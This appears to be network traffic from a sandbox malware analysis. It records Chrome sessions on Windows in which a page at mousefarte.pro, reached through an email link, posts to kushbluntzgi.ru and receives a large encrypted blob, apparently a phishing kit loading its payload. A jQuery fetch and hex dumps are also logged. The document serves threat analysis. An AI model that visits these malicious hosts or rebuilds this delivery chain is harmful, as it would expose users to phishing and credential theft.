                                                                                        2024-10-02 15:15:41 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29
                                                                                        Data Ascii: nction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)))


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.460337188.114.96.34433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:41 UTC603OUTPOST // HTTP/1.1
                                                                                        Host: kushbluntzgi.ru
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 24
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                        Accept: */*
                                                                                        Origin: https://mousefarte.pro
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://mousefarte.pro/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:41 UTC24OUTData Raw: 7b 22 79 61 6d 6d 65 72 22 3a 22 71 75 61 64 72 69 6c 6c 69 6f 6e 22 7d
                                                                                        Data Ascii: {"yammer":"quadrillion"}
                                                                                        2024-10-02 15:15:44 UTC617INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:44 GMT
                                                                                        Content-Type: application/json
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-powered-by: PHP/7.3.33
                                                                                        access-control-allow-origin: *
                                                                                        vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SPMyD30N8Jsxr1pj380lNTQ0nZZpoVbqBq9MZO9px9%2FnJ9WEapNHVZv8MTYD8fmv4lhkJ%2BffHLbSQkbJcTPf7YoUmgZ1xT%2BPUBp2V5FIuQCtBAnFY4xqsoOKUfKpA48sSAI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a63a289f72ab-EWR
                                                                                        2024-10-02 15:15:44 UTC752INData Raw: 34 39 33 35 0d 0a 7b 22 61 22 3a 22 55 69 33 68 6e 6f 61 4b 69 62 76 68 4a 4d 57 4d 38 31 75 2b 46 4b 37 62 66 46 51 50 36 77 32 64 33 69 5c 2f 41 64 6e 33 71 35 62 38 4e 79 51 65 74 6b 6d 7a 49 69 46 4f 47 45 72 42 31 34 68 74 6d 54 78 6a 31 61 48 76 44 55 55 58 43 58 67 50 2b 41 35 59 62 79 6e 39 6e 66 44 54 73 51 65 6e 63 4b 6f 2b 41 33 30 50 50 32 69 54 6a 55 73 79 67 73 36 2b 39 32 72 49 70 73 4d 66 78 7a 61 38 4c 59 35 53 4c 6b 6f 62 50 76 4b 44 73 6e 5a 72 48 52 30 37 6f 46 74 76 68 47 36 51 4d 76 76 7a 68 66 48 2b 69 4e 61 4e 77 6d 48 74 68 4a 6c 6e 41 70 62 6a 53 32 62 4c 73 54 76 53 48 67 54 5c 2f 66 75 59 77 79 47 4b 76 56 4c 34 4e 70 5a 31 6e 4d 43 33 48 63 44 41 4d 64 4e 4e 31 53 52 4d 46 6e 69 51 57 6f 44 70 33 33 61 59 6d 4c 79 6c 64 37 50
                                                                                        Data Ascii: 4935{"a":"Ui3hnoaKibvhJMWM81u+FK7bfFQP6w2d3i\/Adn3q5b8NyQetkmzIiFOGErB14htmTxj1aHvDUUXCXgP+A5Ybyn9nfDTsQencKo+A30PP2iTjUsygs6+92rIpsMfxza8LY5SLkobPvKDsnZrHR07oFtvhG6QMvvzhfH+iNaNwmHthJlnApbjS2bLsTvSHgT\/fuYwyGKvVL4NpZ1nMC3HcDAMdNN1SRMFniQWoDp33aYmLyld7P
                                                                                        2024-10-02 15:15:44 UTC1369INData Raw: 31 78 70 48 53 51 4a 47 6e 38 75 64 30 44 76 6e 38 5a 74 54 55 5c 2f 6e 30 59 76 37 35 54 50 35 52 36 44 71 51 76 36 61 4b 42 71 67 51 69 43 79 47 68 59 49 50 35 6c 5c 2f 2b 63 6e 5c 2f 33 79 52 53 35 6f 74 44 65 41 63 62 63 49 5a 31 51 56 47 44 51 79 41 69 6f 4f 6d 31 55 72 52 53 47 6e 30 54 5a 4f 65 4c 6a 62 36 30 74 7a 35 47 39 63 71 70 50 32 35 67 39 5a 30 56 4b 6f 4e 78 4e 78 69 52 6c 4b 34 31 71 66 55 79 6b 68 44 69 69 6b 72 79 57 4b 4c 7a 57 38 4e 7a 36 52 52 71 31 6e 59 66 58 35 43 5c 2f 34 4a 68 57 48 73 61 36 59 75 77 44 6f 36 65 35 5c 2f 4b 49 72 4c 79 63 4b 36 69 48 42 78 7a 51 47 57 44 63 4e 41 68 4d 70 4f 44 35 30 37 34 78 31 2b 73 4f 53 37 35 30 30 5c 2f 55 6f 5a 6b 7a 78 6b 49 6d 39 39 74 77 33 42 45 6b 70 4a 35 51 42 75 71 6b 6f 67 41 75
                                                                                        Data Ascii: 1xpHSQJGn8ud0Dvn8ZtTU\/n0Yv75TP5R6DqQv6aKBqgQiCyGhYIP5l\/+cn\/3yRS5otDeAcbcIZ1QVGDQyAioOm1UrRSGn0TZOeLjb60tz5G9cqpP25g9Z0VKoNxNxiRlK41qfUykhDiikryWKLzW8Nz6RRq1nYfX5C\/4JhWHsa6YuwDo6e5\/KIrLycK6iHBxzQGWDcNAhMpOD5074x1+sOS7500\/UoZkzxkIm99tw3BEkpJ5QBuqkogAu
                                                                                        2024-10-02 15:15:44 UTC1369INData Raw: 35 53 62 63 6b 46 6a 4d 58 6f 65 5c 2f 46 45 52 5a 50 44 4b 74 65 49 38 6e 4b 46 45 32 2b 79 67 39 6d 57 65 6f 34 52 6e 6a 4d 49 69 69 69 52 63 39 69 51 75 4e 71 4d 41 42 52 61 4e 6e 53 36 36 4a 33 31 43 44 39 35 6f 69 44 36 73 7a 6c 6c 6d 55 43 33 7a 52 72 35 4e 7a 46 69 75 6d 6c 35 63 57 69 6c 39 4d 71 31 4a 33 37 56 51 44 71 48 52 74 68 4f 43 71 55 6d 58 6f 30 61 6a 63 57 56 35 59 4e 78 35 68 76 4d 67 31 61 42 30 76 46 45 30 77 65 46 52 61 6e 35 45 58 42 31 64 50 73 65 70 47 67 61 76 4a 35 62 38 74 69 64 63 36 4a 53 76 43 36 33 75 4e 6b 61 4e 5c 2f 70 6c 53 74 69 44 35 34 6c 59 6d 6f 70 47 6b 58 56 67 5a 32 75 32 7a 6d 4e 67 67 58 41 4b 4b 6d 4a 52 78 71 4a 52 34 74 70 6b 57 4f 63 69 6e 38 57 33 79 4c 64 4d 47 37 72 69 62 47 34 37 6c 70 6b 4e 32 41 65
                                                                                        Data Ascii: 5SbckFjMXoe\/FERZPDKteI8nKFE2+yg9mWeo4RnjMIiiiRc9iQuNqMABRaNnS66J31CD95oiD6szllmUC3zRr5NzFiuml5cWil9Mq1J37VQDqHRthOCqUmXo0ajcWV5YNx5hvMg1aB0vFE0weFRan5EXB1dPsepGgavJ5b8tidc6JSvC63uNkaN\/plStiD54lYmopGkXVgZ2u2zmNggXAKKmJRxqJR4tpkWOcin8W3yLdMG7ribG47lpkN2Ae
                                                                                        2024-10-02 15:15:44 UTC1369INData Raw: 62 53 74 41 69 38 73 42 7a 46 48 74 67 35 6d 36 46 71 54 31 38 4c 77 61 50 46 34 4c 59 68 31 6b 6c 4c 75 43 4c 72 59 61 32 74 53 46 57 4e 48 69 32 63 4b 77 48 61 61 7a 46 30 62 30 41 33 75 54 76 52 36 67 59 71 58 65 55 34 56 61 78 69 2b 45 6d 64 56 4e 48 4a 7a 68 5c 2f 43 2b 37 59 41 47 30 43 67 38 37 74 54 68 2b 31 62 4a 61 36 54 45 69 68 48 65 39 64 57 72 72 45 4e 6a 35 6a 78 55 74 65 51 61 51 70 39 59 42 53 71 4a 34 42 4d 4e 79 41 39 44 46 66 4d 46 2b 4b 50 65 72 32 5c 2f 6e 69 6d 6e 45 4a 50 62 41 37 5a 79 73 53 2b 5c 2f 47 6b 55 55 77 30 57 65 51 61 54 41 41 62 73 39 30 72 46 65 38 4e 53 38 30 4b 65 6e 30 44 35 56 62 76 4c 41 50 53 76 52 63 51 69 4d 56 78 42 67 78 70 61 64 58 76 7a 63 52 48 53 4d 36 54 37 4f 72 76 32 34 62 73 4d 55 74 79 74 6f 4e 34
                                                                                        Data Ascii: bStAi8sBzFHtg5m6FqT18LwaPF4LYh1klLuCLrYa2tSFWNHi2cKwHaazF0b0A3uTvR6gYqXeU4Vaxi+EmdVNHJzh\/C+7YAG0Cg87tTh+1bJa6TEihHe9dWrrENj5jxUteQaQp9YBSqJ4BMNyA9DFfMF+KPer2\/nimnEJPbA7ZysS+\/GkUUw0WeQaTAAbs90rFe8NS80Ken0D5VbvLAPSvRcQiMVxBgxpadXvzcRHSM6T7Orv24bsMUtytoN4
                                                                                        2024-10-02 15:15:44 UTC1369INData Raw: 73 4e 30 69 67 72 7a 4c 38 70 5a 7a 41 37 65 58 57 45 4c 4e 39 30 37 67 4b 52 66 62 31 68 4d 63 6e 54 51 7a 57 4f 39 77 4a 67 73 31 4d 54 39 56 74 47 4f 34 44 32 46 38 56 69 73 6a 66 4b 66 58 54 50 5c 2f 76 37 46 76 64 33 4b 62 31 61 45 7a 63 46 61 5c 2f 52 2b 70 44 6f 62 49 78 46 4a 37 55 32 4c 53 38 32 52 6d 34 68 78 42 6d 71 69 5c 2f 37 32 77 48 63 4e 41 65 59 2b 42 62 6c 41 49 6f 72 32 33 57 45 32 58 6a 5c 2f 77 56 47 6e 30 4f 6f 5c 2f 34 33 30 36 6c 72 56 4e 44 34 52 4e 6c 50 57 75 5c 2f 47 39 32 79 36 56 77 41 68 6a 42 56 53 42 7a 6e 65 7a 4d 6f 41 44 54 6b 77 78 6a 47 4c 44 6d 54 61 31 73 52 77 30 45 49 36 6b 5a 62 43 39 47 37 39 4e 37 48 7a 53 57 4f 6d 49 44 32 5c 2f 41 36 30 72 31 50 47 63 4f 52 76 43 46 71 32 75 57 75 48 63 49 6f 42 57 65 4f 6b
                                                                                        Data Ascii: sN0igrzL8pZzA7eXWELN907gKRfb1hMcnTQzWO9wJgs1MT9VtGO4D2F8VisjfKfXTP\/v7Fvd3Kb1aEzcFa\/R+pDobIxFJ7U2LS82Rm4hxBmqi\/72wHcNAeY+BblAIor23WE2Xj\/wVGn0Oo\/4306lrVND4RNlPWu\/G92y6VwAhjBVSBznezMoADTkwxjGLDmTa1sRw0EI6kZbC9G79N7HzSWOmID2\/A60r1PGcORvCFq2uWuHcIoBWeOk
                                                                                        2024-10-02 15:15:44 UTC1369INData Raw: 75 4d 53 76 79 74 57 30 4c 46 32 58 32 6f 55 32 7a 4b 36 63 72 57 37 4f 5c 2f 74 32 4b 37 76 53 2b 4d 75 5a 74 4f 30 6e 6f 39 44 59 61 49 37 41 6d 4d 64 6c 36 57 43 32 67 41 67 49 4b 78 64 4e 6e 6b 6b 68 63 59 66 46 6e 61 56 73 47 7a 63 72 4b 59 69 6e 44 78 34 47 31 49 34 45 51 6e 6c 35 34 4b 4d 4b 4a 47 74 62 70 58 64 4e 79 61 57 65 45 54 36 73 61 38 49 48 61 74 42 73 65 32 4d 56 72 56 77 41 32 58 68 67 67 6f 37 75 68 54 4d 72 6a 54 5a 6d 4f 31 46 78 45 32 49 39 31 66 44 4b 48 69 64 47 30 42 6b 5c 2f 4f 4e 64 39 64 50 64 73 6d 71 42 6a 4d 39 34 35 61 49 39 63 5c 2f 78 65 2b 74 46 30 2b 55 61 6e 37 46 76 79 4d 4d 45 48 54 53 73 66 31 62 4b 49 6e 41 74 46 42 49 50 75 6e 70 36 2b 4e 59 32 62 71 64 74 58 79 68 36 4e 50 79 71 69 45 34 7a 73 75 62 72 55 76 52
                                                                                        Data Ascii: uMSvytW0LF2X2oU2zK6crW7O\/t2K7vS+MuZtO0no9DYaI7AmMdl6WC2gAgIKxdNnkkhcYfFnaVsGzcrKYinDx4G1I4EQnl54KMKJGtbpXdNyaWeET6sa8IHatBse2MVrVwA2Xhggo7uhTMrjTZmO1FxE2I91fDKHidG0Bk\/ONd9dPdsmqBjM945aI9c\/xe+tF0+Uan7FvyMMEHTSsf1bKInAtFBIPunp6+NY2bqdtXyh6NPyqiE4zsubrUvR
                                                                                        2024-10-02 15:15:44 UTC1369INData Raw: 6a 6f 52 75 56 7a 55 54 6f 7a 51 6e 4b 52 43 41 78 66 5a 44 57 50 73 4a 73 69 58 37 6b 6c 6d 69 39 76 4d 4a 66 41 4a 4c 51 53 69 69 66 33 2b 6e 5a 4e 43 44 61 56 75 4b 43 33 30 49 78 71 47 66 57 44 45 36 59 61 4c 4a 53 4a 6d 64 62 54 48 32 5a 55 62 4e 39 72 6a 61 50 6e 52 76 45 6d 73 58 70 57 4c 35 67 6f 68 47 7a 50 70 48 52 43 56 66 2b 61 4b 70 31 49 73 51 57 53 68 53 65 6c 6e 41 68 67 6f 62 5c 2f 51 48 32 4d 51 44 53 62 6a 38 55 57 48 5a 53 62 4f 64 78 46 51 4e 64 6e 2b 44 45 32 43 4c 6f 37 62 41 71 77 6f 50 33 35 70 50 31 68 70 65 77 46 32 52 52 35 35 58 6e 5a 4a 47 5c 2f 42 48 63 51 36 66 72 70 59 36 45 38 48 49 59 53 6d 79 5a 4f 50 46 55 30 44 58 68 69 4f 6f 6c 6b 44 33 50 41 77 41 37 37 65 4e 61 50 4e 54 67 57 73 73 55 69 5a 48 32 66 4a 52 38 30 6d
                                                                                        Data Ascii: joRuVzUTozQnKRCAxfZDWPsJsiX7klmi9vMJfAJLQSiif3+nZNCDaVuKC30IxqGfWDE6YaLJSJmdbTH2ZUbN9rjaPnRvEmsXpWL5gohGzPpHRCVf+aKp1IsQWShSelnAhgob\/QH2MQDSbj8UWHZSbOdxFQNdn+DE2CLo7bAqwoP35pP1hpewF2RR55XnZJG\/BHcQ6frpY6E8HIYSmyZOPFU0DXhiOolkD3PAwA77eNaPNTgWssUiZH2fJR80m
                                                                                        2024-10-02 15:15:44 UTC1369INData Raw: 72 4e 51 45 6c 39 68 62 6e 69 38 73 4c 67 51 62 68 35 36 6a 30 50 4a 49 63 58 6b 56 52 47 6e 6b 5a 50 75 6c 68 48 78 4f 47 73 68 47 79 76 6e 35 6b 52 31 50 79 52 37 45 42 53 4f 6a 47 32 5c 2f 78 61 47 30 30 72 76 4d 4b 56 59 42 5c 2f 6f 55 51 36 58 49 45 55 39 76 35 65 30 36 65 4e 4e 44 52 6c 32 31 49 68 34 4c 6f 4d 39 6e 4d 2b 5a 6b 6c 6c 77 50 6d 61 37 4b 53 49 31 64 31 52 5a 54 59 42 4a 48 70 2b 53 74 75 65 57 77 37 5c 2f 61 2b 50 4b 6c 49 64 58 51 6e 42 44 5c 2f 62 78 6e 31 6a 33 69 55 69 4d 42 5a 73 37 38 64 68 55 53 34 4e 46 63 6f 44 6c 31 76 4a 6b 6c 52 73 37 34 56 5a 52 33 35 76 48 32 4d 4f 64 56 74 6e 64 6b 79 4b 65 50 69 34 4c 62 6b 6b 70 4c 6c 62 34 47 46 4b 45 44 45 55 6a 6e 47 31 66 54 41 44 6f 6d 35 5c 2f 6b 41 77 78 7a 45 6d 38 49 79 37 6b
                                                                                        Data Ascii: rNQEl9hbni8sLgQbh56j0PJIcXkVRGnkZPulhHxOGshGyvn5kR1PyR7EBSOjG2\/xaG00rvMKVYB\/oUQ6XIEU9v5e06eNNDRl21Ih4LoM9nM+ZkllwPma7KSI1d1RZTYBJHp+StueWw7\/a+PKlIdXQnBD\/bxn1j3iUiMBZs78dhUS4NFcoDl1vJklRs74VZR35vH2MOdVtndkyKePi4LbkkpLlb4GFKEDEUjnG1fTADom5\/kAwxzEm8Iy7k
                                                                                        2024-10-02 15:15:44 UTC1369INData Raw: 4f 55 6b 4b 58 6f 70 79 6e 71 5c 2f 56 62 4c 46 38 50 64 44 71 78 57 41 42 6c 54 6f 6c 6a 62 74 63 38 70 64 43 62 4e 63 49 52 74 77 49 67 39 38 71 34 48 4f 6e 48 41 57 73 59 58 62 37 53 42 42 67 53 35 71 37 57 4a 6f 31 70 78 66 55 67 55 32 43 49 6c 56 52 73 70 48 5c 2f 30 59 6e 69 48 55 6a 76 43 32 37 41 4e 5a 4b 6f 69 35 79 41 42 54 61 39 47 57 57 74 7a 59 62 4e 6c 34 57 6b 66 4b 35 65 55 71 75 6e 6f 77 70 50 67 75 5a 55 4f 4b 30 54 66 38 65 6b 4e 48 77 33 64 37 42 74 52 4c 67 53 5a 52 2b 48 5a 66 72 6c 5c 2f 4d 71 6c 62 51 63 69 63 51 39 75 57 2b 63 69 79 4d 2b 6e 6a 37 74 6f 70 61 77 73 75 50 5c 2f 50 37 4f 31 6e 66 66 54 31 55 77 63 4d 73 51 42 68 43 43 53 73 45 59 59 4c 69 45 6d 4a 62 74 50 57 5c 2f 54 54 72 4a 38 63 6f 63 30 67 56 52 78 79 74 46 41
                                                                                        Data Ascii: OUkKXopynq\/VbLF8PdDqxWABlToljbtc8pdCbNcIRtwIg98q4HOnHAWsYXb7SBBgS5q7WJo1pxfUgU2CIlVRspH\/0YniHUjvC27ANZKoi5yABTa9GWWtzYbNl4WkfK5eUqunowpPguZUOK0Tf8ekNHw3d7BtRLgSZR+HZfrl\/MqlbQcicQ9uW+ciyM+nj7topawsuP\/P7O1nffT1UwcMsQBhCCSsEYYLiEmJbtPW\/TTrJ8coc0gVRxytFA


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.460333188.114.96.34433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:45 UTC669OUTGET /4pAtm/, HTTP/1.1
                                                                                        Host: mousefarte.pro
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: PHPSESSID=v6pg430j5lmu808i368bg8caoa
                                                                                        2024-10-02 15:15:45 UTC667INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 02 Oct 2024 15:15:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        cache-control: private, no-cache, max-age=0
                                                                                        pragma: no-cache
                                                                                        vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0usshNJLM3GY2usosuFMEeYoB3cu6WaCqlSiAum7jNIUQTUjetfSdVnhNoQvSldebH5LwNspS2%2FwVdyTdorIWZ4IEa9E0QDCHBu%2FH3whRZLmD01q%2FfhipKE1skeZFUBRNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a6507d0d42f5-EWR
                                                                                        2024-10-02 15:15:45 UTC1256INData Raw: 34 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f
                                                                                        Data Ascii: 4e1<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
                                                                                        2024-10-02 15:15:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.460338151.101.194.1374433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:45 UTC620OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                        Host: code.jquery.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://mousefarte.pro/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:45 UTC614INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 89501
                                                                                        Server: nginx
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                        ETag: "28feccc0-15d9d"
                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Wed, 02 Oct 2024 15:15:45 GMT
                                                                                        Age: 4073928
                                                                                        X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890028-NYC
                                                                                        X-Cache: HIT, HIT
                                                                                        X-Cache-Hits: 55, 3977
                                                                                        X-Timer: S1727882146.861353,VS0,VE0
                                                                                        Vary: Accept-Encoding
                                                                                        2024-10-02 15:15:45 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                        2024-10-02 15:15:45 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                        Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                        2024-10-02 15:15:46 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
